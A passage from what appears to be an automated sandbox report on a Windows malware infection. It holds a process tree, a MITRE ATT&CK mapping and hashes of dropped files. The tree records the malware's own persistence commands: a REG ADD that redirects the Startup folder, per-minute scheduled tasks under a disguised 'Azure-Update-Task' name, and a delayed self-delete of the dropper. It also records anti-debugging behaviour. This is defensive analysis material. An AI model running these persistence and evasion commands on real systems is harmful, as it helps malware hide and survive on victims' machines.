                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                        2⤵
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:8616
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                          3⤵
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          PID:8844
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                            4⤵
                                                                                                                                              PID:9128
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_1C76.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                            3⤵
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            PID:6640
                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                        1⤵
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        PID:6584
                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                          2⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:6736
                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                        1⤵
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        PID:7524
                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                          2⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:7556
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\EA54.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\EA54.exe
                                                                                                                                        1⤵
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        PID:7288
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A02.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\A02.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:7176
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                            2⤵
                                                                                                                                              PID:7872
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                3⤵
                                                                                                                                                  PID:6928
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5164
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                    3⤵
                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                    PID:7712
                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                1⤵
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                • Modifies registry class
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:7832
                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                PID:7732
                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                1⤵
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                PID:4420
                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{51eecee1-926c-0848-9344-b477b325d623}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                  2⤵
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:7888
                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000170"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:7764
                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                  1⤵
                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                  PID:7580
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                    2⤵
                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    PID:5676
                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                  1⤵
                                                                                                                                                    PID:7516
                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                    1⤵
                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:7860
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5574.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\5574.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:1180
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\REl3PpU5p9.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\REl3PpU5p9.exe"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:7672
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                          3⤵
                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                          PID:7824
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            4⤵
                                                                                                                                                              PID:7584
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jhHuFmrb0b.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\jhHuFmrb0b.exe"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:7020
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                                              3⤵
                                                                                                                                                                PID:7096
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5574.exe"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:6084
                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                  timeout /T 10 /NOBREAK
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:7276
                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                              1⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                              PID:7516
                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                MaskVPNUpdate.exe /silent
                                                                                                                                                                2⤵
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:7036
                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                              1⤵
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:3988
                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                              PID:7956
                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                              1⤵
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:7756
                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                              1⤵
                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              PID:7808
                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                              1⤵
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              PID:7648
                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                              1⤵
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              PID:7792
                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                              PID:8536

                                                                                                                                                            Network

                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                            Execution

                                                                                                                                                            Scheduled Task

                                                                                                                                                            1
                                                                                                                                                            T1053

                                                                                                                                                            Persistence

                                                                                                                                                            Modify Existing Service

                                                                                                                                                            1
                                                                                                                                                            T1031

                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                            1
                                                                                                                                                            T1060

                                                                                                                                                            Scheduled Task

                                                                                                                                                            1
                                                                                                                                                            T1053

                                                                                                                                                            Privilege Escalation

                                                                                                                                                            Scheduled Task

                                                                                                                                                            1
                                                                                                                                                            T1053

                                                                                                                                                            Defense Evasion

                                                                                                                                                            Modify Registry

                                                                                                                                                            4
                                                                                                                                                            T1112

                                                                                                                                                            Disabling Security Tools

                                                                                                                                                            1
                                                                                                                                                            T1089

                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                            1
                                                                                                                                                            T1497

                                                                                                                                                            Install Root Certificate

                                                                                                                                                            1
                                                                                                                                                            T1130

                                                                                                                                                            Credential Access

                                                                                                                                                            Credentials in Files

                                                                                                                                                            4
                                                                                                                                                            T1081

                                                                                                                                                            Discovery

                                                                                                                                                            Software Discovery

                                                                                                                                                            1
                                                                                                                                                            T1518

                                                                                                                                                            Query Registry

                                                                                                                                                            7
                                                                                                                                                            T1012

                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                            1
                                                                                                                                                            T1497

                                                                                                                                                            System Information Discovery

                                                                                                                                                            7
                                                                                                                                                            T1082

                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                            2
                                                                                                                                                            T1120

                                                                                                                                                            Remote System Discovery

                                                                                                                                                            1
                                                                                                                                                            T1018

                                                                                                                                                            Collection

                                                                                                                                                            Data from Local System

                                                                                                                                                            4
                                                                                                                                                            T1005

                                                                                                                                                            Command and Control

                                                                                                                                                            Web Service

                                                                                                                                                            1
                                                                                                                                                            T1102

                                                                                                                                                            Replay Monitor

                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                            Downloads

                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                              MD5

                                                                                                                                                              9499dac59e041d057327078ccada8329

                                                                                                                                                              SHA1

                                                                                                                                                              707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                              SHA256

                                                                                                                                                              ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                              SHA512

                                                                                                                                                              9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                              MD5

                                                                                                                                                              9499dac59e041d057327078ccada8329

                                                                                                                                                              SHA1

                                                                                                                                                              707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                              SHA256

                                                                                                                                                              ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                              SHA512

                                                                                                                                                              9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                              MD5

                                                                                                                                                              aed57d50123897b0012c35ef5dec4184

                                                                                                                                                              SHA1

                                                                                                                                                              568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                              SHA256

                                                                                                                                                              096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                              SHA512

                                                                                                                                                              ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                              MD5

                                                                                                                                                              aed57d50123897b0012c35ef5dec4184

                                                                                                                                                              SHA1

                                                                                                                                                              568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                              SHA256

                                                                                                                                                              096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                              SHA512

                                                                                                                                                              ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                              MD5

                                                                                                                                                              a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                              SHA1

                                                                                                                                                              3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                              SHA256

                                                                                                                                                              5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                              SHA512

                                                                                                                                                              63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                              MD5

                                                                                                                                                              a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                              SHA1

                                                                                                                                                              3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                              SHA256

                                                                                                                                                              5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                              SHA512

                                                                                                                                                              63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                              MD5

                                                                                                                                                              8690d4cc29a3c112ee7f6eb3981ac438

                                                                                                                                                              SHA1

                                                                                                                                                              9e1613d8880a003ac49e52150853673afcd7c8be

                                                                                                                                                              SHA256

                                                                                                                                                              68c926b002e8f4e0784481ea5b902f0a86991ef47787300c913c17821af510c9

                                                                                                                                                              SHA512

                                                                                                                                                              4caafb3cc066b7bb366e849117f86b36e5bc5bef48ee66e7a2fbab83c3613fe119946f80524423ccc85434223fd1aefeab472005e0d1f462101ba080c43286f3

                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                              MD5

                                                                                                                                                              b3b0e1d4e0f45af3e9f2ecbc5b0efcf7

                                                                                                                                                              SHA1

                                                                                                                                                              7ef121021a3361788f6b0931df49bd8b2af165ba

                                                                                                                                                              SHA256

                                                                                                                                                              1aee808791a4ae81536cb6e4301fc9c98f233898e56c48e2f64d19fb5879e9e3

                                                                                                                                                              SHA512

                                                                                                                                                              017af7509e2cff1a803a6db03dd30ffb9d5682c83c11037832433ea05807688841d61e4b17d089902e1a52be1f85f1569a95c855517b4397d289c9dfd45006b2

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aU0lq3rS9AYt7swzVmelr1Jt.exe.log
                                                                                                                                                              MD5

                                                                                                                                                              41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                              SHA1

                                                                                                                                                              5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                              SHA256

                                                                                                                                                              df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                              SHA512

                                                                                                                                                              234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x8DhO4zKpFWjEEHjgLVUu03J.exe.log
                                                                                                                                                              MD5

                                                                                                                                                              41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                              SHA1

                                                                                                                                                              5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                              SHA256

                                                                                                                                                              df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                              SHA512

                                                                                                                                                              234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zl9SXynrcd6IGZZxbWxHYH7B.exe.log
                                                                                                                                                              MD5

                                                                                                                                                              41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                              SHA1

                                                                                                                                                              5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                              SHA256

                                                                                                                                                              df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                              SHA512

                                                                                                                                                              234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                              MD5

                                                                                                                                                              cc0d6b6813f92dbf5be3ecacf44d662a

                                                                                                                                                              SHA1

                                                                                                                                                              b968c57a14ddada4128356f6e39fb66c6d864d3f

                                                                                                                                                              SHA256

                                                                                                                                                              0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498

                                                                                                                                                              SHA512

                                                                                                                                                              4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                              MD5

                                                                                                                                                              b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                              SHA1

                                                                                                                                                              d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                              SHA256

                                                                                                                                                              fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                              SHA512

                                                                                                                                                              98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-9JLVR.tmp\Uw3q9fiBK_7_tw0vLuiOhMeA.tmp
                                                                                                                                                              MD5

                                                                                                                                                              ffcf263a020aa7794015af0edee5df0b

                                                                                                                                                              SHA1

                                                                                                                                                              bce1eb5f0efb2c83f416b1782ea07c776666fdab

                                                                                                                                                              SHA256

                                                                                                                                                              1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

                                                                                                                                                              SHA512

                                                                                                                                                              49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                              MD5

                                                                                                                                                              7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                              SHA1

                                                                                                                                                              1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                              SHA256

                                                                                                                                                              a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                              SHA512

                                                                                                                                                              3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                              MD5

                                                                                                                                                              7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                              SHA1

                                                                                                                                                              1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                              SHA256

                                                                                                                                                              a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                              SHA512

                                                                                                                                                              3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1415455.exe
                                                                                                                                                              MD5

                                                                                                                                                              3598180fddc06dbd304b76627143b01d

                                                                                                                                                              SHA1

                                                                                                                                                              1d39b0dd8425359ed94e606cb04f9c5e49ed1899

                                                                                                                                                              SHA256

                                                                                                                                                              44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

                                                                                                                                                              SHA512

                                                                                                                                                              8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1415455.exe
                                                                                                                                                              MD5

                                                                                                                                                              3598180fddc06dbd304b76627143b01d

                                                                                                                                                              SHA1

                                                                                                                                                              1d39b0dd8425359ed94e606cb04f9c5e49ed1899

                                                                                                                                                              SHA256

                                                                                                                                                              44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

                                                                                                                                                              SHA512

                                                                                                                                                              8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4389679.exe
                                                                                                                                                              MD5

                                                                                                                                                              f74c42768182cf95528b4d32db116680

                                                                                                                                                              SHA1

                                                                                                                                                              c557f307d1d29e0bedb0233361d7605a2e94109a

                                                                                                                                                              SHA256

                                                                                                                                                              d09b9025bf28610cb3def1d2c74fae649bb45a4ae8088cd21e65baa8d06d75f0

                                                                                                                                                              SHA512

                                                                                                                                                              f34d8dbc38c4fa0b5ae8fe3572b0e6428a5acf9494ce9dbe3e9c3c8274f8158c7340b29966221288e56baec22d0bb50dc4404990e413ffa61f0650a6107e953b

                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4389679.exe
                                                                                                                                                              MD5

                                                                                                                                                              f74c42768182cf95528b4d32db116680

                                                                                                                                                              SHA1

                                                                                                                                                              c557f307d1d29e0bedb0233361d7605a2e94109a

                                                                                                                                                              SHA256

                                                                                                                                                              d09b9025bf28610cb3def1d2c74fae649bb45a4ae8088cd21e65baa8d06d75f0

                                                                                                                                                              SHA512

                                                                                                                                                              f34d8dbc38c4fa0b5ae8fe3572b0e6428a5acf9494ce9dbe3e9c3c8274f8158c7340b29966221288e56baec22d0bb50dc4404990e413ffa61f0650a6107e953b

                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                              MD5

                                                                                                                                                              3598180fddc06dbd304b76627143b01d

                                                                                                                                                              SHA1

                                                                                                                                                              1d39b0dd8425359ed94e606cb04f9c5e49ed1899

                                                                                                                                                              SHA256

                                                                                                                                                              44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

                                                                                                                                                              SHA512

                                                                                                                                                              8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                              MD5

                                                                                                                                                              3598180fddc06dbd304b76627143b01d

                                                                                                                                                              SHA1

                                                                                                                                                              1d39b0dd8425359ed94e606cb04f9c5e49ed1899

                                                                                                                                                              SHA256

                                                                                                                                                              44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

                                                                                                                                                              SHA512

